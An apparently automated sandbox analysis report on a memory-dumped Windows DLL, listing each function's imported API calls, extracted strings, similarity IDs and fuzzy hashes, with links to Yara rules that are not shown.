Opcode ID: c5bf5625580d68288714d840463acfda81a6d2f04982f475904e7b159d93dd7f
Instruction ID: 6745fe101ceed3e063e9a8d1c901bc8c1572f19e3c8ba55b5c154ad3832484b2
Opcode Fuzzy Hash: c5bf5625580d68288714d840463acfda81a6d2f04982f475904e7b159d93dd7f
Instruction Fuzzy Hash: 37119E71508B44DFD320CFA9C900B87BBE8EB19614F008A5EE49AC7B40E775A5088B99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E295, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,6EA2E1CB,?,6EA4A640,0000000C,6EA2E273,?,?,?), ref: 6EA2E2EB
GetLastError.KERNEL32(?,6EA2E1CB,?,6EA4A640,0000000C,6EA2E273,?,?,?), ref: 6EA2E2F5
__dosmaperr.LIBCMT ref: 6EA2E320

Strings

@Mt, xrefs: 6EA2E2F5

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: @Mt
API String ID: 2583163307-1491384996
Opcode ID: 41333a013f15a5161c1211770a511491e902ec31a2dd2f3966079cc67295d74e
Instruction ID: de6ca919309b11c3c9cadeff7a444cedc6c4eb2b02b3c9d561fb1422d2576ee8
Opcode Fuzzy Hash: 41333a013f15a5161c1211770a511491e902ec31a2dd2f3966079cc67295d74e
Instruction Fuzzy Hash: A40148336046304ECA5652F899647AD675D8B83B38F3E8639E829FB1C1CB659CC18299

Uniqueness

Uniqueness Score: -1.00%

Function 6EA30381, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,00000001,6EA26918,6EA26918,?,6EA30430,?,?,00000002,00000000), ref: 6EA303BA
GetLastError.KERNEL32(?,6EA30430,?,?,00000002,00000000,?,6EA2ED79,00000001,00000000,00000000,00000002,?,?,?,6EA2685B), ref: 6EA303C4
__dosmaperr.LIBCMT ref: 6EA303CB

Strings

@Mt, xrefs: 6EA303C4

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: @Mt
API String ID: 2336955059-1491384996
Opcode ID: 31d57b1f7830f285b44c42e09ded678fe33a2c8e1973999a065ed9bc013b3cf7
Instruction ID: 7d69c08635ac41d53cb5c9ff27e20bbb0f76e23f0cd3e2505bccf3880288fcaa
Opcode Fuzzy Hash: 31d57b1f7830f285b44c42e09ded678fe33a2c8e1973999a065ed9bc013b3cf7
Instruction Fuzzy Hash: 1601D832620635AFCF058FD9CC44C9E7B29DB86320B380259F854EB180FB71DD828798

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19B5E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6EA18B45), ref: 6EA19B6C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA19B7A
SetLastError.KERNEL32(00000000,?,6EA18B45), ref: 6EA19B83

Strings

@Mt, xrefs: 6EA19B6C

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Value___vcrt_
String ID: @Mt
API String ID: 483936075-1491384996
Opcode ID: a8d1cabd8d44c424767882c76315d9e3359ceea84c48eb807867d06cffbabd82
Instruction ID: dd5b54dbae253606d791d1beef2e7fb3c24dd8fe97d2a5b33ea4b43b73c74e54
Opcode Fuzzy Hash: a8d1cabd8d44c424767882c76315d9e3359ceea84c48eb807867d06cffbabd82
Instruction Fuzzy Hash: E0D0C232229A22978E102AB9ED0C8D536ABE7C327A3068731E014DA094D734944BA650

Uniqueness

Uniqueness Score: -1.00%

Function 6EA28C8A, Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6EA28D11

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c6eeac3a0afb6fc0eee6d046547c1b18ec6dde7edbe5f8b8ae7182ce1f33a42d
Instruction ID: e4271219621874ab18998f8dd6a10e03a57c82b87d9f85790629a09d0e61799c
Opcode Fuzzy Hash: c6eeac3a0afb6fc0eee6d046547c1b18ec6dde7edbe5f8b8ae7182ce1f33a42d
Instruction Fuzzy Hash: F9B104329042569FEB01CFA8C8907EEBBF6EF55340F2C45BAF854AB241D6348D81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19BE3, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6EA19CAA
___AdjustPointer.LIBCMT ref: 6EA19CCD
___AdjustPointer.LIBCMT ref: 6EA19D69

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2a0456263e34e748d0e2552faab976eabdc04f9cd93546487f28dd4e42b84d76
Instruction ID: 0c7c356b6259e369fb2d0bbaa64445ac986fa91b718b74f11ef982fa8d92d388
Opcode Fuzzy Hash: 2a0456263e34e748d0e2552faab976eabdc04f9cd93546487f28dd4e42b84d76
Instruction Fuzzy Hash: A751017260C6029FEB168FD5CA50BEA7BB9EF05314F24052DE8558B294E731ECC1CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05AB0, Relevance: 6.2, APIs: 4, Instructions: 155clipboardCOMMON

Download Yara Rule

APIs

GetClipboardSequenceNumber.USER32(74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05AC1

Part of subcall function 6EA05F40: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05F6A
Part of subcall function 6EA05F40: GetOEMCP.KERNEL32(00000000,?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05FD1
Part of subcall function 6EA05F40: GetForegroundWindow.USER32(?,0000004E,00000002,0000006F,?,0000004E,00000000,?,?,00000000,00000000,0000005F), ref: 6EA06043

GetActiveWindow.USER32 ref: 6EA05BE7
GetTickCount.KERNEL32 ref: 6EA05C20
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05CAA

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@Window__ehfuncinfo$??2@$ActiveClipboardCountForegroundNumberSequenceTick
String ID:
API String ID: 4254224021-0
Opcode ID: 25f373bc376c0988eb254d0cc489e9ac471b0e82185ce4648db3cc90fab4c980
Instruction ID: 7c962d6faad9ea53c724190962b2d82c2af3d066d998549402b8e0c8d82438ea
Opcode Fuzzy Hash: 25f373bc376c0988eb254d0cc489e9ac471b0e82185ce4648db3cc90fab4c980
Instruction Fuzzy Hash: 5E512D31D307184AD723A7B2E14516EB25E5F9B29CB28CB23E401FB2A5FF2568D25984

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07D80, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6EA07DB1

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: c93917551e2a83e279d03a3172f8cf933011d4103725d95c42bfedbdf4302b99
Instruction ID: f304d1e107131466627b10c102a87748e558beca91b73f9f9e21253368b1a986
Opcode Fuzzy Hash: c93917551e2a83e279d03a3172f8cf933011d4103725d95c42bfedbdf4302b99
Instruction Fuzzy Hash: A631F432B053155B9F08DEAEE49157ABBE5EF84770714827EEC05DB284EB31DC90CA84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07E90, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6EA07E97
VariantCopy.OLEAUT32(?,?), ref: 6EA07EA1
_com_issue_error.COMSUPP ref: 6EA07EB3
VariantClear.OLEAUT32 ref: 6EA07EC1

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: da0bdefd2a2b7b483bf9bdc0e6852da7d2617a24cf10ffa9ea2df997ceb6ad3a
Instruction ID: 1928bd7484afe301298a2366c0d55435ada0c7d132e177e2f815041bd3d047b3
Opcode Fuzzy Hash: da0bdefd2a2b7b483bf9bdc0e6852da7d2617a24cf10ffa9ea2df997ceb6ad3a
Instruction Fuzzy Hash: 06D05E723016356B8E216BE5DC0CDCB7A1DEE022693008822F704D6100EBB5C98187F8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2598D, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA25996

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA259A9
_free.LIBCMT ref: 6EA259BA
_free.LIBCMT ref: 6EA259CB

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 00878b7f54268229dc5486f8de6c7e630206e7ee367465fe4664b37a068ae9e4
Instruction ID: 3638e632306bef640782525fa6457046ea116f49f0dde11bed6bb02beb76f994
Opcode Fuzzy Hash: 00878b7f54268229dc5486f8de6c7e630206e7ee367465fe4664b37a068ae9e4
Instruction Fuzzy Hash: 2EE09AB2494F20DA9F25BF5896004893BA5EF9A618359C86AF4103E254C73B0993DFD6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA03DC0, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 397COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 6EA03E57
_strcspn.LIBCMT ref: 6EA03E79

Strings

K;(Io, xrefs: 6EA03DD4

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID: K;(Io
API String ID: 3709121408-79920696
Opcode ID: 8aeeeb707ad1b3b94b1908f1be9f72f9bbaee51a183616428e3197279047857e
Instruction ID: d7331346523baeb1915cc5ca772894500b6e9e33bc24537614953dcda38ade4b
Opcode Fuzzy Hash: 8aeeeb707ad1b3b94b1908f1be9f72f9bbaee51a183616428e3197279047857e
Instruction Fuzzy Hash: CEE1BE71A0024A9FDB00CFE8D994EEEBBB9FF49308F148459E415AB341D735D986CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2D75E, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6EA2D765

Strings

@Mt, xrefs: 6EA2D8CD

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: @Mt
API String ID: 2427045233-1491384996
Opcode ID: fb106b4824ed51d15f9c5dd19d1059e200c4b78e31c7dc24d038ecf5e0b7cca9
Instruction ID: 1cac4380dfba2b37cb6811fa6924e37e60147964f20cf10f52e3769a52092329
Opcode Fuzzy Hash: fb106b4824ed51d15f9c5dd19d1059e200c4b78e31c7dc24d038ecf5e0b7cca9
Instruction Fuzzy Hash: A5719F71D042169FDB208BD5C980BEEBA79AF4A314F1D453AE82077682D7358CC2CF68

Uniqueness

Uniqueness Score: -1.00%

Function 6EA278ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6EA2797D

Strings

pow, xrefs: 6EA27955, 6EA27972

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 06139c4e8a6b83a8b3bd1d663672e50de19b5c826caebc127c62bbced3027ca8
Instruction ID: 64cf6a013f6b929293f043107b67faf3cc15617daa1ef34ac7904fa0e5efed17
Opcode Fuzzy Hash: 06139c4e8a6b83a8b3bd1d663672e50de19b5c826caebc127c62bbced3027ca8
Instruction Fuzzy Hash: 67517C71A183028ECB8167D4C91176937A4DB51750F3CCEA8F0A1E62D8EB358DD98A4E

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2C510, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2C0A9: GetOEMCP.KERNEL32(00000000,6EA2C31F,?,00000000,6EA2D694,6EA2D694,00000000,00000000,?), ref: 6EA2C0D4

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,6EA2C366,00000000,00000000,?,000000FF,00000000,?,?,?,6EA2D694), ref: 6EA2C56E
GetCPInfo.KERNEL32(00000000,6EA2C366,?,?,6EA2C366,00000000,00000000,?,000000FF,00000000,?,?,?,6EA2D694,00000000,00000000), ref: 6EA2C5B0

Strings

K;(Io, xrefs: 6EA2C518

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID: K;(Io
API String ID: 546120528-79920696
Opcode ID: acdf3855ecddefb5d6c0b5f3ef75071fa188655c0ad3dc8b52d6079745a912b1
Instruction ID: e38311abafe0f01fedb594acd0782c0f9bb10275238bcd83b5d39cd86a7751a6
Opcode Fuzzy Hash: acdf3855ecddefb5d6c0b5f3ef75071fa188655c0ad3dc8b52d6079745a912b1
Instruction Fuzzy Hash: 215136B09446059EE7108FB6C8506ABBBF5EF81304F1C64BED096AF241D775D5868B88

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2F429, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA2F470
ReadFile.KERNEL32(?,?,00001000,?,00000000,00000000), ref: 6EA2F4F0

Strings

K;(Io, xrefs: 6EA2F438

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: K;(Io
API String ID: 1834446548-79920696
Opcode ID: 8d94b238484a922e26d5b2e5042b8e89b460039117e26c9edd7252d16f47a1a9
Instruction ID: ed601c3c1a3da1b200d07e17f1a64431f8b1da5ddef6a721a0ffbc6fb6e1aca2
Opcode Fuzzy Hash: 8d94b238484a922e26d5b2e5042b8e89b460039117e26c9edd7252d16f47a1a9
Instruction Fuzzy Hash: 4F410435A00158AFDB15CEB8CD80BD977B6FB48304F6881BEE589BA144D775DEC18B84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2C181, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,00000000,?,00000000), ref: 6EA2C1B3

Strings

K;(Io, xrefs: 6EA2C18C
, xrefs: 6EA2C1F8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $K;(Io
API String ID: 1807457897-202189031
Opcode ID: 05569b243de5c78645b214e31ac85fb34404908505e30a60b9e3f2f9261d4e42
Instruction ID: 01b6ca78d519baf0b83ae4bc6733379b3c6237cbf25a8cb9f4fc08464ceed070
Opcode Fuzzy Hash: 05569b243de5c78645b214e31ac85fb34404908505e30a60b9e3f2f9261d4e42
Instruction Fuzzy Hash: 2F415A7050424C9FEB218AD9CD94BE77BFDEB85704F2804BDD58AAB142D630D9C58B24

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2FBEF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6EA2FD0C
__dosmaperr.LIBCMT ref: 6EA2FD13

Strings

@Mt, xrefs: 6EA2FD0C

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr
String ID: @Mt
API String ID: 1659562826-1491384996
Opcode ID: db6d3660e28f8b50f225ac2f2c9ffffaacf1015f4c738454bb968abde103e0b7
Instruction ID: dabba8b0f9895005cbd951bfe4a580037803c66caf0b3ebe81e17c9e7279c74b
Opcode Fuzzy Hash: db6d3660e28f8b50f225ac2f2c9ffffaacf1015f4c738454bb968abde103e0b7
Instruction Fuzzy Hash: 6241AB79504255AFEB118FA8C880AA97FE5EF46308F3C467CEC84BB245D3318D92C798

Uniqueness

Uniqueness Score: -1.00%

Function 6EA13660, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,49283B4B,?,?), ref: 6EA136AC
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?), ref: 6EA136F4

Strings

K;(Io, xrefs: 6EA13688

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CollectCounterDataFormattedQueryValue
String ID: K;(Io
API String ID: 2961122199-79920696
Opcode ID: daef6638bd0aebb89783a8cf7233037da86c78b4badc8f0f65c8becbe55c68ae
Instruction ID: befec0231cefcf3b50e901bbba3d21847e3ed51b7945c461cc5e32e4b878029c
Opcode Fuzzy Hash: daef6638bd0aebb89783a8cf7233037da86c78b4badc8f0f65c8becbe55c68ae
Instruction Fuzzy Hash: DC5108B5D05609AFDB00CF99C944B9EFBB4FF18310F14822AE829A7740E734B994CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA250A9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EA250EC, 6EA250F3, 6EA25129

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 091a78799120e5305fc9161113a5fd79f1a87a9c78d45dab8158d3716736f946
Instruction ID: 72993795974a2500954120b01d64e5ef24a2fe2df78b7847f0580ec6bbf334f9
Opcode Fuzzy Hash: 091a78799120e5305fc9161113a5fd79f1a87a9c78d45dab8158d3716736f946
Instruction Fuzzy Hash: 3B41B4B0A40614AFDB15EBD98D809DEBBFDFF85304B2C4476E404BB204D7718A81DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA25664, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA256D2
_free.LIBCMT ref: 6EA256F2

Strings

K;(Io, xrefs: 6EA25680, 6EA25710

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: K;(Io
API String ID: 269201875-79920696
Opcode ID: da630a6052013fbfe77ab2c86c3022dfceca717f85e8b9e1b69e341c4574321f
Instruction ID: 2a834ceb5350185288b70b125ad33169be687a712e5f317bf0e1558db2f0751f
Opcode Fuzzy Hash: da630a6052013fbfe77ab2c86c3022dfceca717f85e8b9e1b69e341c4574321f
Instruction Fuzzy Hash: 41418436A40204AFDB14CFA8C980A59B7B6FF89714B1D49B8D915FB344EB31AD41CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1A1E4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EA1A209

Strings

MOC, xrefs: 6EA1A21B
RCC, xrefs: 6EA1A223

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 6798b7040245de37c45af50314ac9f8b7abf43841cd0d46176214692fb49f7d5
Instruction ID: b9dadffafb491a6479f49303e97f5de0b2c3fdabcdb8f780ac8738eadd7fabdf
Opcode Fuzzy Hash: 6798b7040245de37c45af50314ac9f8b7abf43841cd0d46176214692fb49f7d5
Instruction Fuzzy Hash: 44419C71908209AFDF02CFD4CE80AEE7BB6FF09304F188058F905A7261D3369995CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2DAD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6EA2DB27
__freea.LIBCMT ref: 6EA2DB89

Strings

K;(Io, xrefs: 6EA2DADC

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __alloca_probe_16__freea
String ID: K;(Io
API String ID: 1635606685-79920696
Opcode ID: 03b0906f6349f76a591afdb9bd020e42dc7df27119a97e52d07f16845801f665
Instruction ID: 8595b16d51a0f59141960fc656c1338b525562213f210f6552435402d2bde596
Opcode Fuzzy Hash: 03b0906f6349f76a591afdb9bd020e42dc7df27119a97e52d07f16845801f665
Instruction Fuzzy Hash: 45217A7290015AAF9F208EE5DC54DEB7BA8DF85724B190668AC24BB291D731CD81CBA4

Uniqueness

Uniqueness Score: -1.00%

